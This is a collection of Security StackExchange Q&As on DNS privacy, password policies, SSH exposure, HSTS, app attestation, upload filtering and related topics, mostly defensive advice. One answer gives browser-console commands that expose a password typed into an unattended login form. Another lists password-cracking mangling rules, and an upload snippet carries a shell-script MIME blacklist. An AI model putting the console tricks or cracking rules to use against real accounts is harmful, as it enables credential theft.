Looking at the features page of Unblock-Us (a DNS provider) on their website, it states the following: Stay out of the radar of prying eyes. With Unblock-us, you’ll have peace of mind knowing that your ISP or government is unable to view your online activity. We only send a small percentage of data to the websites we support through our secure servers, and we never log or analyze any data passing through. The solution to this invasion of privacy? When you sign up for Unblock-Us, you’ll receive a new set of DNS codes to add within your device’s settings. Your true IP address will then be masked and you’ll be able to bypass any restrictions or spying implemented by your ISP or government, all with this simple switch. So my question is: How can changing your DNS prevent your ISP or government from seeing your online activity? If my understanding of how DNS works is correct, I don't see how these claims are possible.
Essentially, it doesn't. DNS servers let your computer look up where websites and other services are based on friendly names, by converting those to IP addresses. Your ISP provides this as a service, but knows precisely who you are, and what IP your computer has, so can easily look up to see that @user1 has made a request to look at google.com . A third party provider knows what IP address your computer is on (else it couldn't reply to queries), and what sites you are looking for. If they are a free, registration free provider, such as OpenDNS, that's all they know. They can take a pretty good guess at your ISP, and probably your geographical location (since most ISPs assign IPs based on location), but they don't have direct access to your name, or to any other data you send to websites. However, even when using a third party DNS provider, the actual traffic between you and websites goes over your ISPs network. In this case, they can see that @user1 visited 173.194.113.80 and made some requests. If the site is running over HTTP, they can even see that you requested pages from a specific host, thanks to header data such as Host: google.com in each request, and the specific pages thanks to the HTTP verb used (e.g. GET /search?q=dodgy+things ). If the site is running over HTTPS, they just get the IP address, but that's probably enough for them to work out what site you were on, just not the specific pages you looked at.
{ "source": [ "https://security.stackexchange.com/questions/111748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }
111,809
I am using an online service for which I recently had to reset my password because I forgot it. When I went to change the password, I wanted to use one with a symbol from !@£$%^&*(). When I clicked "confirm password" it displayed "_Invalid Data", which I eventually found was because of the symbol. I then spoke to customer services and told them about this (and also asked them to replace "_Invalid Data" with "Passwords can only contain letters and numbers"), and they replied saying "Sorry, the guidelines we put in is place is for security measures". (This is what the message sounded like to me.) The question is: why would they say that it's insecure to allow symbols in passwords, when symbols make them safer? To make sure they have better security in the future, I did educate them and said that if you have an 8-character-long password with letters and numbers only, it allows for 36^8 = 2,821,109,907,456 combinations, whereas including the 12 symbols (!@£$%^&*()_+) allows for 48^8 = 28,179,280,429,056 combinations, meaning there are an extra 25,358,170,521,600 combinations; they are now forwarding this information on to their manager.
These 'security measures' aren't for your security, but for theirs. Symbols like hyphens, apostrophes, percent signs, asterisks, slashes, periods, etc. are useful to attackers for performing "injection" attacks, like SQL Injection, XPath Injection, file path injection, etc. By blocking those characters, the site owners hope that they are preventing you from attacking their servers. They should probably be focused more on proper data handling, like internally using parameterized SQL and special character escaping, but this is an additional measure that could help serve as a stopgap in case they have a hidden coding error in their site. I can't definitively answer 'why' they did this. Maybe they had a security auditor who said "use a whitelisted character set for user input, and block any non alphanumeric symbols." Maybe the web package they bought came with that restriction. Maybe their Vice President of Security said "add some visible measures that give our customers the impression that we take security seriously." Who knows why?
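To make that last point concrete: with proper data handling, symbols in a password never get a chance to be interpreted as SQL in the first place, so there is no security reason to ban them. Below is a minimal, generic sketch of a parameterized query in PHP/PDO; the connection, table and column names are invented purely for illustration.

```php
<?php
// Minimal sketch: user-supplied values are bound as parameters, so characters
// such as ' " ; % or * are treated purely as data and cannot alter the query.
// $pdo is assumed to be an existing PDO connection; the schema is made up.
function checkLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();

    // password_verify() handles the salted hash comparison; no escaping needed.
    return $hash !== false && password_verify($password, $hash);
}
```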
{ "source": [ "https://security.stackexchange.com/questions/111809", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83307/" ] }
111,840
When you're writing a report, what person do you write it as? First person singular : I discovered a vulnerability in HP Power Manager... First person plural : We discovered a vulnerability in HP Power Manager... Third person singular, by name : Bob discovered a vulnerability in HP Power Manager... Third person singular, general : The tester discovered a vulnerability in HP Power Manager... Third person singular, attacker : The attacker discovered a vulnerability in HP Power Manager...
Some other options: Passive voice : A vulnerability in HP Power Manager was discovered... Present tense : HP Power Manager is vulnerable to... It is most common (in the UK at least) to use the passive voice. I prefer using present tense when possible, and first person plural otherwise; the writing feels more personal. But this is controversial; a lot of people think reports are supposed to be formal and not at all personal.
{ "source": [ "https://security.stackexchange.com/questions/111840", "https://security.stackexchange.com", "https://security.stackexchange.com/users/39952/" ] }
112,012
I just sat down at my work computer and began to unlock it by typing in my password, I got 6 of the 8 characters in and decided I wanted coffee and walked away to get it. I came back, realized I left most of the password in, typed in the remaining two characters and logged in. Out of pure curiosity, is there a security risk in that? My thoughts are in most cases it wouldn't be problematic because it gives an attacker one attempt before it is reset and they must start from scratch. However, I suppose at a minimum it lets the attacker know your password is at least that number of characters long (assuming you typed it right) giving them an advantage for future attacks. Is there perhaps a way to grab the text that is typed into the login box, or maybe save the state so you can keep retrying from that partially completed point? What if this were a web page login as opposed to a desktop app?
Corporate espionage is a thing. There could be a security risk if someone has seen you typing your password, or guesses the last two characters. It's not all that difficult to notice people's keystrokes and subconsciously remember them, especially the last few keys. In the case of corporate espionage, someone might want to watch you type your password, and they might remember it. or maybe save the state so you can keep retrying from that partially completed point? You have to admit, given the circumstances, this seems like next-level tinfoil hattery. I can just picture a guy in a grey suit walking up to your desktop, looking for your 20+ GB virtual machine disk, plus accompanying configuration data within a couple minutes, and taking it to a seedy cubicle in the corner of the office, then madly brute-forcing while cackling maniacally: Let's take off the foil for a second. If you are running a virtual machine, then it's quite possible. You could save the state of the virtual machine at that point, and keep trying. The likelihood of this happening to you during a coffee break is pretty much zero. Same with the app state, only not as unlikely as a virtual machine. With the virtual machine, a colleague would have to copy the contents of your virtual hard-drive, plus the accompanying settings, and mount it. More than likely, this would be in excess of 20 GB. Copying this virtual drive in such a short time while other people are around seems quite unlikely. Someone will notice something. What if this were a web page login as opposed to a desktop app? Let's put on our tinfoil hats and see what we can do to retrieve the partially-typed password using only readily-available tools. Put yourself in the shoes of the attacker: how would you quickly get the password before the coffee break is over? Using the developer console, you can modify the web page to change this: <input type="password" name="pass" id="password"/> To this: <input type="text" name="pass" id="password"/> (Removed jQuery as suggested by Doyle Lewis ) We can also get the values through the console input: you can use a variation of these ( F12 > Console > Enter input ): console.log($("#password").val()); (jQuery) console.log(this.pass.val); console.log(document.getElementById("password").value); (dom) Apparently Windows 8 and Windows 10 Enterprise have an "eye" icon that allows you to reveal the plain-text password when holding down the eye button . This becomes an even bigger threat when someone else can just click that one button, bypassing all of the effort used in the examples above. But why would this be a potential security risk? Re-equipping our [Tinfoil Hat (Mythic Warforged)] , let's assume a worst-case scenario: With your username and password, in an enterprise setting where it definitely isn't difficult to find your username (usually your badge ID, or email username), a malicious colleague can attempt to impersonate you on the network. For example: Your corporation has WiFi access which requires your employee badge number and password to sign in. Malicious colleague logs onto the corporate network using your credentials , on an unauthorized device, and then wreaks havoc / steals things without it leading back to them. Most security policies should require device registration first, but there are unfortunately ways around that. You get blamed. It looks like you did it. And the spy who screwed things up may get away scott free . How do I protect against this? 
This very unlikely but possible attack, along with many other attacks that require physical access to your machine (not including hardware-based infections), is completely mitigated by locking your workstation before getting up and by not leaving a partially typed password sitting in the login box. Make this your habit, and you won't have to worry about anyone doing something like this. Don't get complacent, though.
{ "source": [ "https://security.stackexchange.com/questions/112012", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83603/" ] }
112,311
During an internship at a small company, my boss created an account for me, so I generated a password and used it. The next day, my boss told me to write down the password of my account on a piece of paper, put it in an envelope, and sign the envelope. Then he took the envelope and told me that if he needs to access my account and I am unreachable, he is authorized to open the envelope and read the password in order to use it. He also told me that this is a common practice in all companies. Now, I don't know if every company does this (I don't think so), but, to me, it's not legal. Let's say that my boss is a bad person (he's not) and he wants to frame me for something that he did. He only has to open the envelope and read my password (let's say that I'm unreachable) and do his nefarious activity with my account. Now let's say that I can't prove my innocence. How can I prevent all of this? I thought of writing down a wrong password, but if he really needs my account and I'm unreachable, I'll put him in a bad situation. So, is there a way to protect myself (without refusing to write down the password)?
That's what the envelope is (or should be) for: in order to use your password, someone needs to break the seal of the envelope you signed. If you think your password has been abused, you can ask to see the envelope with your signature and check whether it is still unopened. All you need to do, should your management ever actually open the envelope and use your password, is change the password afterwards and hand in a new envelope. You might want to change your password at regular intervals anyway: it's common best practice. By the way: in companies with proper IT management this method is unnecessary, because system administrators can obtain any necessary information from user accounts without having to know the users' passwords. If an administrator really needs to log into a user account, they would reset the password (which would create a verifiable audit trail). And there is usually more than one system administrator, so the admin accounts do not require this method either.
{ "source": [ "https://security.stackexchange.com/questions/112311", "https://security.stackexchange.com", "https://security.stackexchange.com/users/42544/" ] }
112,312
I have Android applications (mobile banking) that connect to my server and perform online transactions (via Internet/USSD/SMS). I want to make sure those clients are not tampered with and are the original ones distributed by me. Keep in mind that not all of my customers download the application via Google Play; some of them use 3rd-party markets or download the APK from elsewhere. Is there a way I can validate the integrity of the application (using a checksum or a signature) on the server side to make sure it's not tampered with (e.g. a trojan has not been implanted in the application and then redistributed)? For suggested solutions: can they be implemented over all 3 communication channels (SMS/USSD/Internet), or are the solutions specific to one or some of the channels? (I'm looking for exactly the technique referred to on this page: https://samsclass.info/android/chase.htm ): Chase's servers don't check the integrity of their Android app when it connects to their servers. It is therefore easy to modify the app, adding trojan code that does malicious things. An attacker who can trick people into using the trojaned app can exploit them. This vulnerability does not affect people who are using the genuine app from the Google Play Store. It would only harm people who are tricked into installing a modified app from a Web site, email, etc.
Update: For 2024, Google has replaced the SafetyNet API with the Play Integrity API . They are conceptually very similar, so the following still largely applies, although the details may differ with the new API. Use Android SafetyNet . This is how Android Pay validates itself. The basic flow is: Your server generates a nonce that it sends to the client app. The app sends a verification request with the nonce via Google Play Services. SafetyNet verifies that the local device is unmodified and passed the CTS . A Google-signed response ("attestation") is returned to your app with a pass/fail result and information about your app's APK (hash and sigining certificate). Your app sends the attestation to your server. Your server validates the nonce and APK signature, and then submits the attestation to a Google server for verification. Google checks the attestation signature and tells you if it is genuine. If this passes, you can be fairly confident that the user is running a genuine version of your app on an unmodified system. The app should get an attestation when it starts up and send it along to your sever with every transaction request. Note, however, this means: Users who have rooted their phone will not pass these checks Users who have installed custom or third-party ROM/firmware/OS (eg Cyanogen) will not pass these checks Users who do not have access to Google Play Services (eg Amazon devices, people in China) will not pass these checks ...and therefore will be unable to use your app. Your company needs to make a business decision as to whether or not these restrictions (and the accompanying upset users) are acceptable. Finally, realize that this is not an entirely airtight solution . With root access and perhaps Xposed, it is possible to modify the SafetyNet library to lie to Google's servers, telling them the "right" answers to get a verification pass result that Google signs. In reality, SafetyNet just moves the goalposts and makes it harder for malicious actors. Since these checks ultimately have to run on a device out of your control, it is indeed impossible to design an entirely secure system. Read an excellent analysis of how the internals of SafetyNet work here.
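As a rough illustration of steps 5 and 6 (the server-side checks), the sketch below decodes the JWS attestation payload and inspects the fields involved. It is deliberately incomplete and must not be used as-is: a real server first has to verify the JWS signature (by validating the certificate chain in the JWS header, or by submitting the statement to Google's verification endpoint) before trusting any of these fields. The package name and certificate digest are placeholders, and PHP is used purely for illustration.

```php
<?php
// Incomplete sketch of the server-side attestation checks (steps 5-6 above).
// WARNING: JWS signature verification is omitted; a real server MUST verify
// the signature before trusting the payload. EXPECTED_* values are placeholders.
const EXPECTED_PACKAGE     = 'com.example.bankingapp';            // placeholder
const EXPECTED_CERT_DIGEST = 'base64-of-your-signing-cert-hash';  // placeholder

function attestationLooksValid(string $jws, string $expectedNonce): bool
{
    $parts = explode('.', $jws);                 // JWS = header.payload.signature
    if (count($parts) !== 3) {
        return false;
    }
    // The payload is base64url-encoded JSON.
    $json = base64_decode(strtr($parts[1], '-_', '+/'));
    $p = json_decode($json, true);
    if (!is_array($p)) {
        return false;
    }
    // $expectedNonce is assumed to hold the raw nonce bytes this server issued.
    return ($p['nonce'] ?? '') === base64_encode($expectedNonce)
        && ($p['apkPackageName'] ?? '') === EXPECTED_PACKAGE
        && in_array(EXPECTED_CERT_DIGEST, $p['apkCertificateDigestSha256'] ?? [], true)
        && ($p['ctsProfileMatch'] ?? false) === true   // device passed CTS
        && ($p['basicIntegrity'] ?? false) === true;
}
```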
{ "source": [ "https://security.stackexchange.com/questions/112312", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81374/" ] }
112,319
I'm working on a PHP system where the user can upload files. I'm trying to protect the system from malicious code, so I'm thinking about some type of blacklist of files that I have to block from upload. I know that a whitelist is better than a blacklist, and that is my usual approach, but in this case I need to use a blacklist of files for many reasons (out of my control), while still looking for safety (if possible). This is my current script (I'm checking the MIME type to get the file type): $finfo = finfo_open(FILEINFO_MIME_TYPE); $check = finfo_file($finfo, $file["tmp_name"]); finfo_close($finfo); $dangerMime = array('application/x-bsh', 'application/x-sh', 'application/x-shar', 'text/x-script.sh'); if (in_array($check, $dangerMime)) { // block upload } else { // allow upload } The current list of MIME types to block is: 'application/x-bsh', 'application/x-sh', 'application/x-shar', 'text/x-script.sh'. I'm trying to block any .sh file, since the system is running on CentOS under Apache. Are there any other file types that I should also block? Following is some important information: the server is CentOS 7.2 with Apache 2.4.6. These are the permissions of the uploads directory: drwxr-xr-x 4 apache apache 4096 Jan 8 12:23 uploads Note: In this project I'm acting just as a developer, so I can't change the file permissions.
It is not clear from your description why exactly you want to block these files. I see the following possibilities: You want to block files that might infect the server itself. Unfortunately, this can be just about anything: shell, Perl, Python, awk, ... and of course compiled binaries. But to get these files executed without explicitly calling them with an interpreter, the executable bit must be set, which should not be the case if the file gets uploaded from inside a web application. This is at least the case on UNIX systems; on Windows the extension is enough, and there you also have PowerShell, JavaScript, batch files and all the other types. Still, something must at least trigger the execution of the file, or the upload directory must be in the search path for DLLs and shared libraries. Or you want to block files which might be executed by the web server itself, i.e. from inside the web application. These are PHP, ASP, CGI, ... files which will be executed via a URL and cause harm to the user or to the server. Of course, this only works if your upload directory is reachable by a URL, or if the attacker manages to break out of the upload directory with path traversal attacks or similar, or if the attacker manages to get some server-side code to include these files (i.e. a local file inclusion attack). Or you want to block files which might be included to serve malware to the user, i.e. corrupt PDF documents, or JavaScript redirecting to malware sites. In this case you probably have an upload directory which is reachable by a URL, because you want users to download these files. Unfortunately, for such files, not only the file type you see is important but also the context in which they are called (i.e. as image, script, CSS, object, ...), and you are not able to control this usage. ... but in this case I need to do a blacklist of files for many reasons, Since you obviously don't know which files can be dangerous at all, such a blacklist will never work. There will always be file types you miss, or the attacker will hide their file behind some other type, i.e. construct a polyglot.
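If the external constraints ever relax, the standard alternative (which both the question and this answer acknowledge is better) is a whitelist of the few types you actually expect, checked with the same finfo approach. A minimal sketch follows; the allowed types are only examples, not a recommendation for any particular system.

```php
<?php
// Minimal whitelist sketch: only types you explicitly expect are accepted,
// everything else is rejected. The allowed list below is only an example.
$allowedMime = [
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'application/pdf' => 'pdf',
];

$finfo = finfo_open(FILEINFO_MIME_TYPE);
$detected = finfo_file($finfo, $file['tmp_name']);
finfo_close($finfo);

if (!isset($allowedMime[$detected])) {
    // reject the upload: unexpected type
} else {
    // store under a server-chosen name with a safe extension, never the
    // user-supplied filename, e.g.:
    // $name = bin2hex(random_bytes(16)) . '.' . $allowedMime[$detected];
}
```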
{ "source": [ "https://security.stackexchange.com/questions/112319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83205/" ] }
112,383
I was reading the security advice given by the Swedish Bankers' Association . They included these two pieces of advice (my translation), that I assume is to teach the user to check for SSL/TLS and protect from SSL-strip: Check that it is the address of your bank in the address bar of your browser before you log on to your internet bank. The web address on the log on page should start with https:// and a padlock symbol should be visible in the browser. This is a fairly important topic, since some Swedish banks serve their main page (where the link to the internet bank is) over HTTP, and none of them have implemented HSTS. However, I see a number of problems with the advice given: How do I check that it is the adress of my bank? An ordinary user would probably go scanning the URL for the name of the bank, and be satisfied when they find it. So armed only with this advice you would easily fall for mybank.com.evil.com/mybank.com . (Unfortunately the URL for logon pages are often not very clean, so customers would expect a messy URL.) "So I remember there was something with an h and a couple of p or t or something I should look for. http:// ? Yeah, that was probably it. Must be safe." Look for the padlock in the browser ? Seriously? You can just include it in the page, don't even need to use the old favicon trick to fool someone reading this advice. Naturally I started to think about what some actual good advice would be to give on this subject, but I found it surprisingly hard. The advice should be (A) short, (B) easy to remember and understand even for a user with little technical knowledge, and (C) apply to all fairly modern browsers. Imagine you have 30 seconds to explain this to a not very-tech savvy relative. Any suggestions?
Update 09/2018: While I previously stated that this might be a good option, the world has changed, and the use of EV is no longer a particularly reliable indicator, even given the drawbacks mentioned below. There are articles such as this one from Troy Hunt which explain the full issue, but, in short, browsers are no longer treating EV certificates as something particularly special, and are hiding or reducing the indicators of EV status. Taking the first of the sites shown previously, for instance, gives the following display in, respectively, Chrome 69, Edge, Firefox 62 and Internet Explorer 10. Safari on mobile shows a green padlock and "Barclays PLC", Chrome on mobile shows a green padlock, "https" in green, then the rest of the URL in black. In other words, even if the site does use an EV certificate, there isn't a single indicator that can be easily communicated to a non-technical person anymore. It was always at the mercy of browsers, and it's no longer treated as anything special. So, what's the alternative? Nothing springs to mind: the URLs below are from a range of subdomains of the bank sites, which makes looking for the bank name harder, and it doesn't work on some mobile devices, which don't show the full URL. The padlock symbol is easy to work around, given the availability of free SSL certificates for domains you control. Browsers mostly currently show "https://", but not "http://" now, but relying on that remaining the case has most of the same issues as relying on the green address bar. That leaves typing the bank address into the address bar each time, and being absolutely sure it's not got typos in, which is not a reliable method either. Searching isn't reliable: most search providers are pretty good at weeding out fake links in adverts on terms like "online banking login", but it only takes one missed link. Following links from the main bank site just moves the verification issue up one level. I suppose it's down to just being careful: use a single device to access the banking site, using a bookmark which has been checked carefully on creation, and don't allow anyone else to access that device, so they can't be modified. It probably makes sense for some people, but I could see that being a too high burden on the average user, where devices are shared with family members or could be accessed by co-workers. Original 02/2016: I was going to suggest that ensuring that the login screen for the online banking system showed the name of the bank in green, in the address bar might work. But then I started wondering if any of the local banks I know about did that properly. It's less encouraging than I'd hoped. For these nine fairly large banks, 6 provide the name of the bank in the EV cert bar. 2 provide the name of the parent group (which might not always be obvious), and one doesn't even have an EV certificate. The EV certificate is designed to make this easy, if it's used properly - you can't fake it easily, and it's outside the page area, so can't be inserted by a malicious actor. However, it seems that banks aren't doing so well at using it..
{ "source": [ "https://security.stackexchange.com/questions/112383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
112,425
If I type my password twice (like: PwdThingPwdThing ), OR type every character twice (like: PPwwddTThhiinngg ) will that make it substantially more secure than it already is? Assume that it is already 8 or 9 characters, consisting of upper and lower case, digits and one or more special characters. (Also assume that I didn't tell anyone that I am doing it this way, although I just told the world... Doh!) I ask because I would like more security in a way that I can still remember, and this would be an easy change to make and recall.
Let's try skipping theory and going straight to practice. Will typing the same word twice (or N times) substantially help? John the Ripper Jumbo has a variety of "simple rules" about this: d duplicate: "Fred" -> "FredFred" f reflect: "Fred" -> "FredderF" oclHashcat's rules-based attack has simple rules just for this, too: d Duplicate entire word d p@ssW0rd p@ssW0rdp@ssW0rd pN Append duplicated word N times p2 p@ssW0rd p@ssW0rdp@ssW0rdp@ssW0rd Reflect f Duplicate word reversed f p@ssW0rd p@ssW0rddr0Wss@p Therefore, no; this bit of cleverness is so common that it's already included explicitly in both common rulesets, for use by itself or in combination with other rules. OR type every character twice John the Ripper Jumbo has an example specifically about this in the documentation: XNMI extract substring NM from memory and insert into current word at I is the core rule, and "<4X011X113X215" (duplicate every character in a short word) is the example in the documentation covering exactly your case for short passwords. oclHashcat's rules-based attack has simple rules just for these kinds of attacks: q Duplicate every character q p@ssW0rd pp@@ssssWW00rrdd zN Duplicates first character N times z2 p@ssW0rd ppp@ssW0rd ZN Duplicates last character N times Z2 p@ssW0rd p@ssW0rddd XNMI Insert substring of length M starting from position N of word saved to memory at position I lMX428 p@ssW0rd p@ssw0rdw0 Therefore, no, again: this is such a common bit of cleverness that it's called out explicitly in both major open source cracking products. Assume that it is already 8 or 9 characters, consisting of upper and lower case, digits and one or more special characters. The other rules in those products very likely cover everything you're doing already, and it's also likely that whatever combination you have is already included in a ruleset applied to a reasonable cracking wordlist. oclHashcat alone comes with twenty-five different files full of .rules, including d3ad0ne.rule with more than 35,000 rules, dive.rule with over 120,000 rules, and so on. A large number of wordlists are available, some of which may include your exact password - the Openwall wordlist alone has a single 500 MB file of more than 40 million words, including mangled ones - and I'm personally aware of both small, very good wordlists (phpbb, et al.) and huge, comprehensive wordlists with literally billions of entries, taking up many gigabytes of space in total. As with everyone else, you need to try randomness, or something like an entire sentence's worth of personal anecdote that does NOT use words in a top-5000 list of common English words and does use long, uncommon words (to force combinatorial attacks using much larger dictionaries). Look, for example, for words selected at (good) random from Ubuntu's insane English ispell dictionary list that are not included in the standard English ispell dictionary.
{ "source": [ "https://security.stackexchange.com/questions/112425", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
112,493
Suppose that my site is located at foo.example.com and I send the following HTTP header when visitors accessing my site using HTTPS: Strict-Transport-Security: max-age=31536000; includeSubDomains Would the HSTS policy have any effect on domains such as example.com or bar.example.com ? I'm not in charge of the certificates but the common name is *.example.com on the certificate so I'm not sure if that matters. The certificate isn't valid for abc.foo.example.com , but I imagine that if there is a valid cert for such a host that the HSTS policy would apply there.
Based on the RFC, HTTP Strict Transport Security (HSTS) , the includeSubDomains states: 6.1.2. The includeSubDomains Directive The OPTIONAL "includeSubDomains" directive is a valueless directive which, if present (i.e., it is "asserted"), signals the UA that the HSTS Policy applies to this HSTS Host as well as any subdomains of the host's domain name. Therefore your HSTS policy would only apply to foo.example.com and *.foo.example.com example.com and bar.example.com would not be impacted. For more info, there is a great thread on webmasters titled Do I need a wildcard SSL certificate for inclusion in the HSTS preload list?
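A small practical illustration of that scope rule: if you also want example.com and bar.example.com covered, the policy (with includeSubDomains) has to be served from example.com itself over HTTPS, not just from foo.example.com. The same header can equally be set in the web server configuration; PHP is used below purely as an illustration.

```php
<?php
// Served from https://example.com/ (the parent domain) so that, with
// includeSubDomains, the policy covers bar.example.com, foo.example.com and
// every other subdomain. Served only from foo.example.com, it would cover
// foo.example.com and *.foo.example.com, exactly as described above.
header('Strict-Transport-Security: max-age=31536000; includeSubDomains');
```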
{ "source": [ "https://security.stackexchange.com/questions/112493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/28137/" ] }
112,510
When running a public web server (e.g., with Apache), I've heard it's recommended to bind SSH to a second IP address, different from the one Apache is listening to. But for me it seems like this is only a matter of obfuscation - once an attacker knows the second IP address, the situation would be the same as with a single IP address. Am I right? Or are there any other benefits of using a second IP address except for obfuscation?
Unless that IP address belongs to a dedicated management network which implements additional security, it is a waste of resources. Both IPs, obviously, end up on the same server. This means that, unless they come in through different networks (i.e. a management network that implements additional protection), there will be no difference locally between an SSH connection arriving on one IP or the other: you can firewall them in exactly the same way (if you want), and it doesn't make anything more or less obvious in the logs. The only thing you're "hiding" is the relation between the SSH server and the web server and, unless you have a very poor procedure for picking account names, that shouldn't matter. If you're using a dedicated management network, however, it's a different matter: such a network could require all connections to go through a secure authentication phase and impose extra limitations on the connecting party (for instance, you can require them to be physically connected to the network, or to go through a VPN requiring 2FA and making sure your client is "clean").
{ "source": [ "https://security.stackexchange.com/questions/112510", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99007/" ] }
112,528
I've heard multiple times that you should never leave SSH with a password open over the internet. Why is this so bad? I understand the password can be brute-forced, but what if it is a very strong password that would take eons to crack? Are there more things to consider than just brute force, or am I missing anything else?
Why is this so bad? Because there are tons of bots just scanning the web for open ports and trying to log in; once a scanner bot finds an open SSH port, it may be queued for another bot (or botnet) to try to brute-force the password. One of the risks here is that, eventually, they may succeed in figuring out the password and take control of the server. I understand the password can be brute-forced, but what if it is a very strong password that would take eons to crack? Having a long password is a mitigation technique; however, the resource consumption of a brute-force attack (bandwidth, disk space used for logs, and CPU, for example) can also be damaging. Mitigation Some techniques to mitigate a brute-force attack on SSH (see the example configuration below): Use a different port; don't get a false sense of security from this, but many bots do search for port 22 exclusively. ( Related question ) Disable SSH passwords Require a private key for logging in Throttle connections Implement an IPS ( Fail2ban and Snort come to mind) Restrict login per IP address Restrict which users can log in (different from checking the IP address)
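As a concrete sketch of the second, third and last items, these are the sshd_config directives typically involved. This is only an illustration, not a complete hardening guide; the port number and user name are placeholders, and you should confirm key-based login works before disabling passwords.

```
# /etc/ssh/sshd_config (excerpt) - illustrative only, adjust to your environment
PasswordAuthentication no          # disable password logins entirely
ChallengeResponseAuthentication no
PubkeyAuthentication yes           # require key-based authentication
PermitRootLogin no                 # no direct root logins
MaxAuthTries 3                     # limit authentication attempts per connection
AllowUsers alice                   # placeholder: only listed users may log in
#Port 2222                         # optional: move off port 22 (obscurity only)
```

After editing, reload the SSH daemon (e.g. systemctl reload sshd on systemd-based systems) from a session you keep open, so that a mistake doesn't lock you out.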
{ "source": [ "https://security.stackexchange.com/questions/112528", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99025/" ] }
112,545
What are the main advantages of using LibreSSL vs OpenSSL ? As I understood LibreSSL is a fork of OpenSSL: LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with goals of modernizing the codebase, improving security, and applying best practice development processes. Seems like a good idea to use it. Is it this library widely used? Why would server administrators choose LibreSSL over OpenSSL?
There is a very extensive article on Wikipedia, and it does not make sense to reiterate everything here. But to give you some highlights: It replaces OpenSSL on OpenBSD, on OS X since 10.11, and on some other systems. It started by throwing away lots of code which was considered useless for the target platforms or insecure by design, and it also added some more secure defaults. The result is that, of the 6 critical vulnerabilities in OpenSSL since the fork, none affected LibreSSL. Why would server administrators choose LibreSSL over OpenSSL? If you care about security, or want to sleep better at night and not worry about the next OpenSSL vulnerability, the choice should be clear.
{ "source": [ "https://security.stackexchange.com/questions/112545", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57364/" ] }
112,563
So, I am designing a door authentication system (can't really go into more detail) for our school, so that only authenticated persons can go through a certain internal door. They hold that its inner workings should be kept a secret, so that no one can reverse engineer it. I maintain that this would be security through obscurity, which is bad. I have designed the system such that knowing how it works wouldn't help you get in; only having the key would help you get in, in accordance with Kerckhoff's principle. They still maintain that instead of more people knowing about it, fewer should. Is it a good idea to go with a closed design? If not, exactly why? P.S. They only told me it was a secret after I had designed most of it and told a bunch of people, if that makes a difference (I had no idea they wanted it to be a secret). P.P.S. Although it is not open to the outside, the room it is protecting contains more valuable stuff than the rest of the school, so I would expect adversaries to be able to reverse engineer it anyway if we go with a closed design instead of an open one, but I'm not sure how to communicate that.
Obscurity isn't a bad security measure to have in place. Relying upon obscurity, as your sole or most substantial security measure, is more or less a cardinal sin. Kerckhoff's Principle is perhaps the most oft-cited argument against implementing security through obscurity. However, if the system is already properly secure according to that principle, this is mis-guided. The principle, paraphrased, says "assume the enemy knows everything about the design of your security systems". This does not in any way imply "tell the enemy everything about your system, because they know anyway". If the system is already well-designed according to Kerckhoff's Principle, the worst that can be said about applying security through obscurity to it is that it adds little to no value. At the same time, for such a system, there is equally little to no harm in protecting the confidentiality of its design.
{ "source": [ "https://security.stackexchange.com/questions/112563", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56579/" ] }
112,696
I work from home. Why would a company I am about to do some work for ask for my IP address? What would they need it for? Should I be worried? Thanks
This seems to be a persistent question. IP addresses aren't secrets. Every website you go to must know your IP address. There's no reason to not give away your IP address. Many companies have firewalls that only allow certain addresses through to certain ports. This is a relatively common way of controlling access to resources with minimal effort. However, most people don't have static IP addresses at home, and your IP address can suddenly change without notice. So just be aware that the IP you have today might not be the IP you have tomorrow.
{ "source": [ "https://security.stackexchange.com/questions/112696", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99207/" ] }
112,768
I have locally made a Root CA certificate. I used the CA cert to sign the IA cert and used the IA cert to sign the server certificate. When I try to access the local server which uses the server certificate, it gives me a security risk warning. Is there a way to make it not give the warning? All I basically want to know is, is it possible to make self signed certificate trusted?
You need to import the root certificate into the trust store for the browser. Once the browser knows you trust this root certificate, all certificates signed by this will show up as trusted. Note that this will only make the connection trusted for you, any others who don't have the root certificate installed will still receive an error.
{ "source": [ "https://security.stackexchange.com/questions/112768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99297/" ] }
112,786
Lately I've been reading about things like BadUSB and RubberDucky which are essentially USB sticks that tell the computer they are a keyboard. Once they are plugged in they "type in" whatever commands they were told to execute. My question is, why are keyboards automatically trusted in almost every OS? For example, if an OS detects a new keyboard plugged in, why not pop up a password prompt and disallow that keyboard from doing anything until it enters the password? It doesn't seem like this would create a ton of usability issues. Is there a reason why this or another protection measure isn't used?
The trust model for a device you plug in to your computer is just inherently difficult. The USB standard was created to allow literally anyone to create a USB device. Security wasn't a factor. Even if it was, where do you place the trust? The movie industry tried this model with HDMI, and it's essentially failed miserably. You can't simultaneously give someone a device that does something, and prevent them from understanding how to do the same thing. Your example proposes to put the trust in the user. The most obvious problem is nobody wants to type in passwords just to use a keyboard. Barring that, would it really solve anything? The user already trusts the device, otherwise they wouldn't be plugging it into their computer. Since trust has already been established, why wouldn't they simply do whatever is required to get it to work?
{ "source": [ "https://security.stackexchange.com/questions/112786", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99312/" ] }
112,802
